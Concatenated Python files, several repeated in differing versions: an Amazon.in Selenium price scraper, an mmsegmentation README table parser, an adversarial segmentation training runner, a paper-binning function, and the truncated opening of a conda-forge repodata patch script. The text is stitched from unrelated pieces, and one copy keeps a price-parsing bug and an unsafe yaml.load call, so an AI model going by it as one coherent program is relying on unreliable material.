        # options.add_argument('--headless')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--incognito')
        # NOTE(review): chrome_options= is deprecated in Selenium 4;
        # kept for compatibility with the pinned driver version.
        self.driver = webdriver.Chrome(
            "./chromedriver", chrome_options=options)
        self.currency = currency
        # Amazon's p_36 filter takes prices in hundredths, hence "00".
        # Single quotes inside the f-string keep this parseable on
        # Python < 3.12 (quote reuse requires PEP 701).
        self.price_filter = f"&rh=p_36%3A{filters['min']}00-{filters['max']}00"

    def run(self):
        """Execute the full scrape and return the product dicts."""
        print("Starting Script...")
        print(f"Looking for {self.search_term} products...")
        links = self.get_products_links()
        if not links:
            print("Stopped script.")
            return
        print(f"Got {len(links)} links to products...")
        print("Getting info about products...")
        products = self.get_products_info(links)
        print(f"Got info about {len(products)} products...")
        self.driver.quit()
        return products

    def get_products_links(self):
        """Search for the term and return product detail-page URLs."""
        self.driver.get(self.base_url)
        element = self.driver.find_element_by_xpath(
            '//*[@id="twotabsearchtextbox"]')
        element.send_keys(self.search_term)
        element.send_keys(Keys.ENTER)
        time.sleep(2)  # wait to load page
        self.driver.get(f'{self.driver.current_url}{self.price_filter}')
        print(f"Our url: {self.driver.current_url}")
        time.sleep(2)  # wait to load page
        result_list = self.driver.find_elements_by_class_name('s-result-list')
        # result_list = self.driver.find_elements_by_class_name('s-search-results')
        links = []
        try:
            results = result_list[0].find_elements_by_xpath(
                "//div/span/div/div/div[2]/div[2]/div/div[1]/div/div/div[1]/h2/a")
            links = [link.get_attribute('href') for link in results]
            return links
        except Exception as e:
            print("Didn't get any products...")
            print(e)
            return links

    def get_products_info(self, links):
        """Fetch detail info for every link; skip incomplete products."""
        asins = self.get_asins(links)
        products = []
        for asin in asins:
            product = self.get_single_product_info(asin)
            if product:
                products.append(product)
        return products

    def get_asins(self, links):
        """Extract the ASIN from each product URL."""
        return [self.get_asin(link) for link in links]

    def get_single_product_info(self, asin):
        """Open a product page and return its details, or None if any
        of title/seller/price could not be read."""
        print(f"Product ID: {asin} - getting data...")
        product_short_url = self.shorten_url(asin)
        self.driver.get(f'{product_short_url}?language=en_GB')
        time.sleep(2)
        title = self.get_title()
        seller = self.get_seller()
        price = self.get_price()
        if title and seller and price:
            product_info = {
                'asin': asin,
                'url': product_short_url,
                'title': title,
                'seller': seller,
                'price': price
            }
            return product_info
        return None

    def get_title(self):
        """Return the product title text, or None on failure."""
        try:
            return self.driver.find_element_by_id('productTitle').text
        except Exception as e:
            print(e)
            print(f"Can't get title of a product - {self.driver.current_url}")
            return None

    def get_seller(self):
        """Return the seller/byline text, or None on failure."""
        try:
            return self.driver.find_element_by_id('bylineInfo').text
        except Exception as e:
            print(e)
            print(f"Can't get seller of a product - {self.driver.current_url}")
            return None

    def get_price(self):
        """Return the product price as a float, or None on failure.

        Falls back to the "other offers" price when the main price
        element is absent.
        """
        price = None
        try:
            price = self.driver.find_element_by_id('priceblock_ourprice').text
            price = self.convert_price(price)
        except NoSuchElementException:
            try:
                availability = self.driver.find_element_by_id(
                    'availability').text
                if 'Available' in availability:
                    price = self.driver.find_element_by_class_name(
                        'olp-padding-right').text
                    price = price[price.find(self.currency):]
                    price = self.convert_price(price)
            except Exception as e:
                print(e)
                print(
                    f"Can't get price of a product - {self.driver.current_url}")
                return None
        except Exception as e:
            print(e)
            print(f"Can't get price of a product - {self.driver.current_url}")
            return None
        return price

    @staticmethod
    def get_asin(product_link):
        """Extract the ASIN between '/dp/' and '/ref' in a product URL."""
        return product_link[product_link.find('/dp/') + 4:product_link.find('/ref')]

    def shorten_url(self, asin):
        """Build the canonical short product URL for an ASIN."""
        return self.base_url + 'dp/' + asin

    def convert_price(self, price):
        """Parse a displayed price string into a float.

        Handles a fractional part rendered on its own line
        ("<sym>1,234\\n56" -> 1234.56) and thousands separators.
        """
        price = price.split(self.currency)[1]
        try:
            # Whole and fractional parts can appear on separate lines.
            price = price.split("\n")[0] + "." + price.split("\n")[1]
        except IndexError:
            pass  # no separate fractional part
        # Remove every thousands separator; the previous version kept
        # only the first two comma groups, corrupting prices > 999,999.
        price = price.replace(",", "")
        return float(price)
if __name__ == '__main__':
    #DIRECTORY = 'reports'
    # Gather search parameters interactively, then scrape matching
    # products and write a JSON report.
    NAME = input("Enter the name of the product you want to search: ")
    CURRENCY = '₹'
    MIN_PRICE = input("The minimum price you can afford: ")
    MAX_PRICE = input("The maximum price you can afford: ")
    FILTERS = {
        'min': MIN_PRICE,
        'max': MAX_PRICE
    }
    BASE_URL = "http://www.amazon.in/"
    am = AmazonAPI(NAME, FILTERS, BASE_URL, CURRENCY)
    data = am.run()
    GeneratejsonReport(NAME, FILTERS, BASE_URL, CURRENCY, data)
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
import json
from datetime import datetime
from jsonReport import GeneratejsonReport
class AmazonAPI:
    """Scrape Amazon search results for a term within a price range."""

    def __init__(self, search_term, filters, base_url, currency):
        # Launch a local chromedriver in incognito mode; headless mode
        # is intentionally left disabled (commented out) for debugging.
        self.base_url = base_url
        self.search_term = search_term
        options = webdriver.ChromeOptions()
        # set_automation_as_head_less(options)
        # options.add_argument('--headless')
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--incognito')
        # NOTE(review): chrome_options= is deprecated in Selenium 4.
        self.driver = webdriver.Chrome(
            "./chromedriver", chrome_options=options)
        self.currency = currency
        # Amazon's p_36 filter takes prices in hundredths, hence "00".
        self.price_filter = f"&rh=p_36%3A{filters['min']}00-{filters['max']}00"

    def run(self):
        """Execute the full scrape and return the product dicts."""
        print("Starting Script...")
        print(f"Looking for {self.search_term} products...")
        links = self.get_products_links()
        if not links:
            print("Stopped script.")
            return
        print(f"Got {len(links)} links to products...")
        print("Getting info about products...")
        products = self.get_products_info(links)
        print(f"Got info about {len(products)} products...")
        self.driver.quit()
        return products

    def get_products_links(self):
        """Search for the term and return product detail-page URLs."""
        self.driver.get(self.base_url)
        element = self.driver.find_element_by_xpath(
            '//*[@id="twotabsearchtextbox"]')
        element.send_keys(self.search_term)
        element.send_keys(Keys.ENTER)
        time.sleep(2)  # wait to load page
        self.driver.get(f'{self.driver.current_url}{self.price_filter}')
        print(f"Our url: {self.driver.current_url}")
        time.sleep(2)  # wait to load page
        result_list = self.driver.find_elements_by_class_name('s-result-list')
        # result_list = self.driver.find_elements_by_class_name('s-search-results')
        links = []
        try:
            results = result_list[0].find_elements_by_xpath(
                "//div/span/div/div/div[2]/div[2]/div/div[1]/div/div/div[1]/h2/a")
            links = [link.get_attribute('href') for link in results]
            return links
        except Exception as e:
            print("Didn't get any products...")
            print(e)
            return links

    def get_products_info(self, links):
        """Fetch detail info for every link; skip incomplete products."""
        asins = self.get_asins(links)
        products = []
        for asin in asins:
            product = self.get_single_product_info(asin)
            if product:
                products.append(product)
        return products

    def get_asins(self, links):
        """Extract the ASIN from each product URL."""
        return [self.get_asin(link) for link in links]

    def get_single_product_info(self, asin):
        # Returns None unless title, seller, and price were all found.
        print(f"Product ID: {asin} - getting data...")
        product_short_url = self.shorten_url(asin)
        self.driver.get(f'{product_short_url}?language=en_GB')
        time.sleep(2)
        title = self.get_title()
        seller = self.get_seller()
        price = self.get_price()
        if title and seller and price:
            product_info = {
                'asin': asin,
                'url': product_short_url,
                'title': title,
                'seller': seller,
                'price': price
            }
            return product_info
        return None

    def get_title(self):
        """Return the product title text, or None on failure."""
        try:
            return self.driver.find_element_by_id('productTitle').text
        except Exception as e:
            print(e)
            print(f"Can't get title of a product - {self.driver.current_url}")
            return None

    def get_seller(self):
        """Return the seller/byline text, or None on failure."""
        try:
            return self.driver.find_element_by_id('bylineInfo').text
        except Exception as e:
            print(e)
            print(f"Can't get seller of a product - {self.driver.current_url}")
            return None

    def get_price(self):
        # Falls back to the "other offers" price when the main price
        # element is absent; returns None on any failure.
        price = None
        try:
            price = self.driver.find_element_by_id('priceblock_ourprice').text
            price = self.convert_price(price)
        except NoSuchElementException:
            try:
                availability = self.driver.find_element_by_id(
                    'availability').text
                if 'Available' in availability:
                    price = self.driver.find_element_by_class_name(
                        'olp-padding-right').text
                    price = price[price.find(self.currency):]
                    price = self.convert_price(price)
            except Exception as e:
                print(e)
                print(
                    f"Can't get price of a product - {self.driver.current_url}")
                return None
        except Exception as e:
            print(e)
            print(f"Can't get price of a product - {self.driver.current_url}")
            return None
        return price

    @staticmethod
    def get_asin(product_link):
        # ASIN sits between '/dp/' and '/ref' in a product URL.
        return product_link[product_link.find('/dp/') + 4:product_link.find('/ref')]

    def shorten_url(self, asin):
        """Build the canonical short product URL for an ASIN."""
        return self.base_url + 'dp/' + asin

    def convert_price(self, price):
        # Strip the currency symbol, join a newline-separated fractional
        # part, and drop a thousands separator before parsing.
        # NOTE(review): the bare excepts merely construct an Exception
        # and discard it; and only the first two comma groups are kept,
        # so prices above 999,999 parse incorrectly — worth fixing.
        price = price.split(self.currency)[1]
        try:
            price = price.split("\n")[0] + "." + price.split("\n")[1]
        except:
            Exception()
        try:
            price = price.split(",")[0] + price.split(",")[1]
        except:
            Exception()
        return float(price)
if __name__ == '__main__':
    #DIRECTORY = 'reports'
    # Gather search parameters interactively, then scrape matching
    # products and write a JSON report.
    NAME = input("Enter the name of the product you want to search: ")
    CURRENCY = '₹'
    MIN_PRICE = input("The minimum price you can afford: ")
    MAX_PRICE = input("The maximum price you can afford: ")
    FILTERS = {
        'min': MIN_PRICE,
        'max': MAX_PRICE
    }
    BASE_URL = "http://www.amazon.in/"
    am = AmazonAPI(NAME, FILTERS, BASE_URL, CURRENCY)
    data = am.run()
    GeneratejsonReport(NAME, FILTERS, BASE_URL, CURRENCY, data)
import os
import json
# Paths into the local mmsegmentation checkout: README tables are first
# dumped to text files, then parsed into per-model JSON files.
config_path = '/home/work/PycharmProjects/mmsegmentation/configs'
path2drafts = '/home/work/PycharmProjects/mmsegmentation/supervisely/train/src_backup'
txt_ = os.path.join(path2drafts, 'cleared_tables')
os.makedirs(txt_, exist_ok=True)
json_ = os.path.join(path2drafts, 'dirty_json')
os.makedirs(json_, exist_ok=True)
global_dict = {}  # NOTE(review): never populated in this script
# Pass 1: extract every markdown table row ("|"-prefixed line) from each
# model's README into <model>.txt.
for path, folder, file in os.walk(config_path):
    # print(path, folder, file)
    if 'README.md' in file:
        model_kind = path.split('/')[-1]
        py_configs_list = [f for f in file if '.py' in f]
        if py_configs_list.__len__() > 0:
            # Dataset name is the last "_"-separated token of a config
            # file name (str.strip('.py') strips chars, not the suffix).
            datasets = set([d.split('_')[-1].strip('.py') for d in py_configs_list])
            dataset = datasets.pop()
        else:
            dataset = None
        print(path, model_kind, dataset, file)
        with open(os.path.join(path, 'README.md'), 'r') as file_to_read:
            txt = file_to_read.read()
        print(txt)
        cleared_lines = [i for i in txt.split('\n') if i.startswith('|')]
        with open(f'{txt_}/{model_kind}.txt', 'w') as file_to_write:
            for line in cleared_lines:
                file_to_write.write(line + '\n')  # file_to_write.writelines(cleared_lines)
# Pass 2: parse the dumped tables into a list of row dicts per model.
files = sorted(os.listdir(txt_))
js = []  # [i.replace('.json', '') for i in sorted(os.listdir(json_))]
queued_files = [file for file in files if file.replace('.txt', '') not in js]
for file in queued_files:
    with open(os.path.join(txt_, file), 'r') as file_to_read:
        data = file_to_read.read()
    cleared_lines = data.split('\n')
    if 'regnet' in file:
        print(file)
    checked = False  # NOTE(review): set below but never read
    archs = []
    for line in cleared_lines:
        # A header row names the columns for the data rows that follow.
        if 'Download' in line or 'Config' in line or 'Backbone' in line:
            headers = [i.strip() for i in line.split('|') if i != '']
            checked = True
        if '[config]' in line:
            # Empty cells ("||") would otherwise vanish in the split.
            line = line.replace('||', '| - |')
            data = [i.strip() for i in line.split('|') if i != '']
            try:
                assert len(headers) == len(data)
            except AssertionError:
                # Pad short rows so zip() keeps all headers.
                data.append('')
            new_dict = {}
            for head, col_data in zip(headers, data):
                # NOTE(review): str.strip removes any of these chars from
                # both ends, not the literal markup — confirm intended.
                value = col_data.strip('[config]()').strip('[model]()')
                if ') |' in value:
                    value = value.split(') |')[0]
                new_dict[head] = value
            archs.append(new_dict)
    # Single quotes inside the f-string keep this parseable on
    # Python < 3.12 (quote reuse requires PEP 701).
    with open(f"{json_}/{file.replace('.txt', '')}.json", 'w') as file_to_write:
        json.dump(obj=archs, fp=file_to_write, indent=4)
import os
import json
# Paths into the local mmsegmentation checkout: README tables are first
# dumped to text files, then parsed into per-model JSON files.
config_path = '/home/work/PycharmProjects/mmsegmentation/configs'
path2drafts = '/home/work/PycharmProjects/mmsegmentation/supervisely/train/src_backup'
txt_ = os.path.join(path2drafts, 'cleared_tables')
os.makedirs(txt_, exist_ok=True)
json_ = os.path.join(path2drafts, 'dirty_json')
os.makedirs(json_, exist_ok=True)
global_dict = {}  # NOTE(review): never populated in this script
# Pass 1: extract every markdown table row ("|"-prefixed line) from each
# model's README into <model>.txt.
for path, folder, file in os.walk(config_path):
    # print(path, folder, file)
    if 'README.md' in file:
        model_kind = path.split('/')[-1]
        py_configs_list = [f for f in file if '.py' in f]
        if py_configs_list.__len__() > 0:
            # Dataset name is the last "_"-separated token of a config
            # file name (str.strip('.py') strips chars, not the suffix).
            datasets = set([d.split('_')[-1].strip('.py') for d in py_configs_list])
            dataset = datasets.pop()
        else:
            dataset = None
        print(path, model_kind, dataset, file)
        with open(os.path.join(path, 'README.md'), 'r') as file_to_read:
            txt = file_to_read.read()
        print(txt)
        cleared_lines = [i for i in txt.split('\n') if i.startswith('|')]
        with open(f'{txt_}/{model_kind}.txt', 'w') as file_to_write:
            for line in cleared_lines:
                file_to_write.write(line+'\n')  # file_to_write.writelines(cleared_lines)
# Pass 2: parse the dumped tables into a list of row dicts per model.
files = sorted(os.listdir(txt_))
js = []  # [i.replace('.json', '') for i in sorted(os.listdir(json_))]
queued_files = [file for file in files if file.replace('.txt', '') not in js]
for file in queued_files:
    with open(os.path.join(txt_, file), 'r') as file_to_read:
        data = file_to_read.read()
    cleared_lines = data.split('\n')
    if 'regnet' in file:
        print(file)
    checked = False  # NOTE(review): set below but never read
    archs = []
    for line in cleared_lines:
        # A header row names the columns for the data rows that follow.
        if 'Download' in line or 'Config' in line or 'Backbone' in line:
            headers = [i.strip() for i in line.split('|') if i != '']
            checked = True
        if '[config]' in line:
            # Empty cells ("||") would otherwise vanish in the split.
            line = line.replace('||', '| - |')
            data = [i.strip() for i in line.split('|') if i != '']
            try:
                assert len(headers) == len(data)
            except:
                # Pad short rows so zip() keeps all headers.
                data.append('')
            new_dict = {}
            for head, col_data in zip(headers, data):
                # NOTE(review): str.strip removes any of these chars from
                # both ends, not the literal markup — confirm intended.
                value = col_data.strip('[config]()').strip('[model]()')
                if ') |' in value:
                    value = value.split(') |')[0]
                new_dict[head] = value
            archs.append(new_dict)
    with open(f"{json_}/{file.replace('.txt','')}.json", 'w') as file_to_write:
        json.dump(obj=archs, fp=file_to_write, indent=4)
from utils.update_hparams import update_hparams
from utils.logger import Logger
import yaml
import os
from experiments.segmentation.adversarial_network_train_val_early.data_generator import Dataset_train
from experiments.segmentation.adversarial_network_train_val_early.train_pipeline import TrainPipeline
from models.segmentation.adv_unet_train_val_early import Model
def run(
    batch_size=None,
    lr=None,
    n_epochs=None,
    gpu='1',
    dropout=None,
    experiment='./experiments/adversarial_network_train_val_early/config_brats_2.yml',
):
    """Train the adversarial segmentation model and log KPI metrics.

    Args:
        batch_size: Override for the configured batch size (None keeps config).
        lr: Override for the configured learning rate.
        n_epochs: Override for the configured epoch count.
        gpu: Comma-separated GPU ids, e.g. '0,1'; None selects no GPUs.
        dropout: Override for the configured dropout rate.
        experiment: Path to the YAML experiment config.
    """
    # load hyperparameters; with-block closes the previously leaked handle
    with open(experiment) as config_file:
        # NOTE(review): yaml.load without an explicit Loader is unsafe on
        # untrusted input and deprecated — consider yaml.safe_load.
        hparams = yaml.load(config_file)
    # create output folders
    for f in [hparams['debug_path'], hparams['model_path'], hparams['checkpoint_path']]:
        os.makedirs(f, exist_ok=True)
    # process gpu selection string, e.g. '0,1' -> [0, 1]
    if gpu is not None:
        gpu = [int(i) for i in gpu.split(",")]
    hparams = update_hparams(
        hparams=hparams, dropout=dropout, batch_size=batch_size, lr=lr, n_epochs=n_epochs,
    )
    logger = Logger()
    # run cross-val
    cross_val = TrainPipeline(hparams=hparams, gpu=gpu, model=Model, Dataset_train=Dataset_train)
    fold_scores_val, fold_scores_test, start_training = cross_val.train()
    # save logs (single quotes inside f-strings keep Python < 3.12 support)
    logger.kpi_logger.info('=============================================')
    logger.kpi_logger.info(f'Datetime = {start_training}')
    logger.kpi_logger.info(f'Model metric, val = {fold_scores_val}')
    logger.kpi_logger.info(f'Model metric, test = {fold_scores_test}')
    logger.kpi_logger.info(f'Experiment = {experiment}')
    logger.kpi_logger.info(f"Batch size = {hparams['batch_size']}")
    logger.kpi_logger.info(f"Lr = {hparams['optimizer_hparams']['lr']}")
    logger.kpi_logger.info(f"N epochs = {hparams['n_epochs']}")
    logger.kpi_logger.info(f'GPU = {gpu}')
    logger.kpi_logger.info(f"Dropout rate = {hparams['model']['dropout_rate']}")
    logger.kpi_logger.info(f"Model name: = {hparams['model_name']}")
    logger.kpi_logger.info('=============================================')
from utils.update_hparams import update_hparams
from utils.logger import Logger
import yaml
import os
from experiments.segmentation.adversarial_network_train_val_early.data_generator import Dataset_train
from experiments.segmentation.adversarial_network_train_val_early.train_pipeline import TrainPipeline
from models.segmentation.adv_unet_train_val_early import Model
def run(
    batch_size=None,
    lr=None,
    n_epochs=None,
    gpu='1',
    dropout=None,
    experiment='./experiments/adversarial_network_train_val_early/config_brats_2.yml',
):
    """Run cross-validated training for the adversarial segmentation model.

    Non-None CLI-style overrides take precedence over the YAML config.

    Args:
        batch_size (int, optional): Override for the config batch size.
        lr (float, optional): Override for the config learning rate.
        n_epochs (int, optional): Override for the config number of epochs.
        gpu (str, optional): Comma-separated GPU ids, e.g. '0,1'; None leaves
            device selection to the pipeline.
        dropout (float, optional): Override for the config dropout rate.
        experiment (str, optional): Path to the YAML experiment config.
    """
    # Load hyperparameters. A context manager closes the file handle, and
    # safe_load avoids the deprecated (and unsafe) yaml.load-without-Loader call.
    with open(experiment) as config_file:
        hparams = yaml.safe_load(config_file)
    # create output folders
    for f in [hparams['debug_path'], hparams['model_path'], hparams['checkpoint_path']]:
        os.makedirs(f, exist_ok=True)
    # process gpu selection string, e.g. '0,1' -> [0, 1]
    if gpu is not None:
        gpu = [int(i) for i in gpu.split(",")]
    hparams = update_hparams(
        hparams=hparams, dropout=dropout, batch_size=batch_size, lr=lr, n_epochs=n_epochs,
    )
    logger = Logger()
    # run cross-val
    cross_val = TrainPipeline(hparams=hparams, gpu=gpu, model=Model, Dataset_train=Dataset_train)
    fold_scores_val, fold_scores_test, start_training = cross_val.train()
    # save logs
    logger.kpi_logger.info('=============================================')
    logger.kpi_logger.info(f'Datetime = {start_training}')
    logger.kpi_logger.info(f'Model metric, val = {fold_scores_val}')
    logger.kpi_logger.info(f'Model metric, test = {fold_scores_test}')
    logger.kpi_logger.info(f'Experiment = {experiment}')
    logger.kpi_logger.info(f"Batch size = {hparams['batch_size']}")
    logger.kpi_logger.info(f"Lr = {hparams['optimizer_hparams']['lr']}")
    logger.kpi_logger.info(f"N epochs = {hparams['n_epochs']}")
    logger.kpi_logger.info(f'GPU = {gpu}')
    logger.kpi_logger.info(f"Dropout rate = {hparams['model']['dropout_rate']}")
    logger.kpi_logger.info(f"Model name: = {hparams['model_name']}")
    logger.kpi_logger.info('=============================================')
|
import logging
import sys
from typing import List, Dict
import numpy as np
import pandas as pd
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def aggregate_paper(
    data: List[Dict[str, str]],
    start_year: int = 2016,
    bins_per_year: int = 4,
    filtering: bool = False,
    filter_keys: List = list(),
    unwanted_keys: List = list(),
    return_filtered: bool = False,
    filter_abstract: bool = True,
    last_year: int = 2021,
):
    """Consumes a list of unstructured keyword results from a .jsonl and
    aggregates papers into several bins per year.
    Args:
        data (List[Dict[str,str]]): Content of a .jsonl file, i.e., a list of
            dictionaries, one per paper.
        start_year (int, optional): First year of interest. Defaults to 2016.
        bins_per_year (int, optional): Defaults to 4 (quarterly aggregation).
        filtering (bool, optional): Whether or not all papers in .jsonl are
            perceived as matches or whether an additional sanity checking for
            the keywords is performed in abstract/title. Defaults to False.
        filter_keys (list, optional): List of str used for filtering. Only
            applies if filtering is True. Defaults to empty list.
        unwanted_keys (list, optional): List of str that must not occur in either
            title or abstract. Only applies if filtering is True.
        return_filtered (bool, optional): Whether the filtered matches are also
            returned. Only applies if filtering is True. Defaults to False.
        filter_abstract (bool, optional): Whether the keyword is searched in the
            abstract or not. Defaults to True.
        last_year (int, optional): Most recent year for the aggregation. Defaults
            to 2021. All newer entries are discarded.
    Returns:
        bins (np.array): Vector of length (last_year - start_year + 1) x
            bins_per_year. If return_filtered is True, a (bins, papers) tuple.
    """
    if not isinstance(data, list):
        raise ValueError(f"Expected list, received {type(data)}")
    if not isinstance(bins_per_year, int):
        raise ValueError(f"Expected int, received {type(bins_per_year)}")
    if 12 % bins_per_year != 0:
        raise ValueError(f"Cant split year into {bins_per_year} bins")
    num_years = last_year - start_year + 1
    bins = np.zeros((num_years * bins_per_year))
    if len(data) == 0:
        return bins if not return_filtered else (bins, [])
    # Remove duplicate entries (keep only the earliest one per title)
    df = pd.DataFrame(data).sort_values(by="date", ascending=True)
    data = df.drop_duplicates(subset="title", keep="first").to_dict("records")
    dates = [dd["date"] for dd in data]
    filtered = []
    for paper, date in zip(data, dates):
        year = int(date.split("-")[0])
        if year < start_year or year > last_year:
            continue
        # At least one synonym per keyword needs to be in either title or
        # abstract.
        if filtering and filter_keys != list():
            # Filter out papers with undesired terms
            unwanted = False
            for unwanted_key in unwanted_keys:
                if unwanted_key.lower() in paper["title"].lower():
                    unwanted = True
                if (
                    filter_abstract
                    and paper["abstract"] is not None
                    and unwanted_key.lower() in paper["abstract"].lower()
                ):
                    unwanted = True
            if unwanted:
                continue
            got_keys = []
            for key_term in filter_keys:
                got_key = False
                if not isinstance(key_term, list):
                    key_term = [key_term]
                for key in key_term:
                    if key.lower() in paper["title"].lower():
                        got_key = True
                    if (
                        filter_abstract
                        and paper["abstract"] is not None
                        and key.lower() in paper["abstract"].lower()
                    ):
                        got_key = True
                got_keys.append(got_key)
            # Every keyword group must have matched at least once.
            if len(got_keys) != sum(got_keys):
                continue
        filtered.append(paper)
        if len(date.split("-")) < 2:
            logger.warning(
                f"Paper without month {date}, randomly assigned month."
                f"{paper['title']}"
            )
            # Months are 1-based; np.random.choice(12) yields 0-11, so shift by
            # one — month 0 would produce a negative (wrong-year) bin index.
            month = np.random.choice(12) + 1
        else:
            month = int(date.split("-")[1])
        year_bin = year - start_year
        month_bin = int(np.floor((month - 1) / (12 / bins_per_year)))
        bins[year_bin * bins_per_year + month_bin] += 1
    if return_filtered:
        return bins, filtered
    else:
        return bins
| import logging
import sys
from typing import List, Dict
import numpy as np
import pandas as pd
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)
def aggregate_paper(
    data: List[Dict[str, str]],
    start_year: int = 2016,
    bins_per_year: int = 4,
    filtering: bool = False,
    filter_keys: List = list(),
    unwanted_keys: List = list(),
    return_filtered: bool = False,
    filter_abstract: bool = True,
    last_year: int = 2021,
):
    """Consumes a list of unstructured keyword results from a .jsonl and
    aggregates papers into several bins per year.
    Args:
        data (List[Dict[str,str]]): Content of a .jsonl file, i.e., a list of
            dictionaries, one per paper.
        start_year (int, optional): First year of interest. Defaults to 2016.
        bins_per_year (int, optional): Defaults to 4 (quarterly aggregation).
        filtering (bool, optional): Whether or not all papers in .jsonl are
            perceived as matches or whether an additional sanity checking for
            the keywords is performed in abstract/title. Defaults to False.
        filter_keys (list, optional): List of str used for filtering. Only
            applies if filtering is True. Defaults to empty list.
        unwanted_keys (list, optional): List of str that must not occur in either
            title or abstract. Only applies if filtering is True.
        return_filtered (bool, optional): Whether the filtered matches are also
            returned. Only applies if filtering is True. Defaults to False.
        filter_abstract (bool, optional): Whether the keyword is searched in the
            abstract or not. Defaults to True.
        last_year (int, optional): Most recent year for the aggregation. Defaults
            to 2021. All newer entries are discarded.
    Returns:
        bins (np.array): Vector of length (last_year - start_year + 1) x
            bins_per_year. If return_filtered is True, a (bins, papers) tuple.
    """
    if not isinstance(data, list):
        raise ValueError(f"Expected list, received {type(data)}")
    if not isinstance(bins_per_year, int):
        raise ValueError(f"Expected int, received {type(bins_per_year)}")
    if 12 % bins_per_year != 0:
        raise ValueError(f"Cant split year into {bins_per_year} bins")
    num_years = last_year - start_year + 1
    bins = np.zeros((num_years * bins_per_year))
    if len(data) == 0:
        return bins if not return_filtered else (bins, [])
    # Remove duplicate entries (keep only the earliest one per title)
    df = pd.DataFrame(data).sort_values(by="date", ascending=True)
    data = df.drop_duplicates(subset="title", keep="first").to_dict("records")
    dates = [dd["date"] for dd in data]
    filtered = []
    for paper, date in zip(data, dates):
        year = int(date.split("-")[0])
        if year < start_year or year > last_year:
            continue
        # At least one synonym per keyword needs to be in either title or
        # abstract.
        if filtering and filter_keys != list():
            # Filter out papers with undesired terms
            unwanted = False
            for unwanted_key in unwanted_keys:
                if unwanted_key.lower() in paper["title"].lower():
                    unwanted = True
                if (
                    filter_abstract
                    and paper["abstract"] is not None
                    and unwanted_key.lower() in paper["abstract"].lower()
                ):
                    unwanted = True
            if unwanted:
                continue
            got_keys = []
            for key_term in filter_keys:
                got_key = False
                if not isinstance(key_term, list):
                    key_term = [key_term]
                for key in key_term:
                    if key.lower() in paper["title"].lower():
                        got_key = True
                    if (
                        filter_abstract
                        and paper["abstract"] is not None
                        and key.lower() in paper["abstract"].lower()
                    ):
                        got_key = True
                got_keys.append(got_key)
            # Every keyword group must have matched at least once.
            if len(got_keys) != sum(got_keys):
                continue
        filtered.append(paper)
        if len(date.split("-")) < 2:
            logger.warning(
                f"Paper without month {date}, randomly assigned month."
                f"{paper['title']}"
            )
            # Months are 1-based; np.random.choice(12) yields 0-11, so shift by
            # one — month 0 would produce a negative (wrong-year) bin index.
            month = np.random.choice(12) + 1
        else:
            month = int(date.split("-")[1])
        year_bin = year - start_year
        month_bin = int(np.floor((month - 1) / (12 / bins_per_year)))
        bins[year_bin * bins_per_year + month_bin] += 1
    if return_filtered:
        return bins, filtered
    else:
        return bins
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from collections import defaultdict
import copy
import json
import os
from os.path import join, isdir
import sys
import tqdm
import re
import requests
import pkg_resources
from get_license_family import get_license_family
# Channel whose repodata is patched by this script.
CHANNEL_NAME = "conda-forge"
# Base URL the channel is served from.
CHANNEL_ALIAS = "https://conda.anaconda.org"
# Platform subdirectories whose repodata this script processes.
SUBDIRS = (
    "noarch",
    "linux-64",
    "linux-armv7l",
    "linux-aarch64",
    "linux-ppc64le",
    "osx-64",
    "osx-arm64",
    "win-32",
    "win-64",
)
REMOVALS = {
"noarch": (
"sendgrid-5.3.0-py_0.tar.bz2",
),
"linux-64": (
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"airflow-with-gcp_api-1.9.0-3.tar.bz2",
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
"compliance-checker-3.0.3-py27_0.tar.bz2",
"compliance-checker-3.0.3-py35_0.tar.bz2",
"compliance-checker-3.0.3-py36_0.tar.bz2",
"doconce-1.0.0-py27_0.tar.bz2",
"doconce-1.0.0-py27_1.tar.bz2",
"doconce-1.0.0-py27_2.tar.bz2",
"doconce-1.0.0-py27_3.tar.bz2",
"doconce-1.0.0-py27_4.tar.bz2",
"doconce-1.4.0-py27_0.tar.bz2",
"doconce-1.4.0-py27_1.tar.bz2",
"gdk-pixbuf-2.36.9-0.tar.bz2",
"itk-4.12.0-py27_0.tar.bz2",
"itk-4.12.0-py35_0.tar.bz2",
"itk-4.12.0-py36_0.tar.bz2",
"itk-4.13.0-py27_0.tar.bz2",
"itk-4.13.0-py35_0.tar.bz2",
"itk-4.13.0-py36_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np110py27_1.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_0.tar.bz2",
"ecmwf_grib-1.14.7-np111py27_1.tar.bz2",
"libtasn1-4.13-py36_0.tar.bz2",
"libgsasl-1.8.0-py36_1.tar.bz2",
"nipype-0.12.0-0.tar.bz2",
"nipype-0.12.0-py35_0.tar.bz2",
"postgis-2.4.3+9.6.8-0.tar.bz2",
"pyarrow-0.1.post-0.tar.bz2",
"pyarrow-0.1.post-1.tar.bz2",
"pygpu-0.6.5-0.tar.bz2",
"pytest-regressions-1.0.1-0.tar.bz2",
"rapidpy-2.5.2-py36_0.tar.bz2",
"smesh-8.3.0b0-1.tar.bz2",
"statuspage-0.3.3-0.tar.bz2",
"statuspage-0.4.0-0.tar.bz2",
"statuspage-0.4.1-0.tar.bz2",
"statuspage-0.5.0-0.tar.bz2",
"statuspage-0.5.1-0.tar.bz2",
"tokenize-rt-2.0.1-py27_0.tar.bz2",
"vaex-core-0.4.0-py27_0.tar.bz2",
),
"osx-64": (
"adios-1.13.1-py36hbecc8f4_0.tar.bz2",
"airflow-with-gcp_api-1.9.0-1.tar.bz2",
"airflow-with-gcp_api-1.9.0-2.tar.bz2",
"arpack-3.6.1-blas_openblash1f444ea_0.tar.bz2",
"cookiecutter-1.4.0-0.tar.bz2",
"compliance-checker-2.2.0-0.tar.bz2",
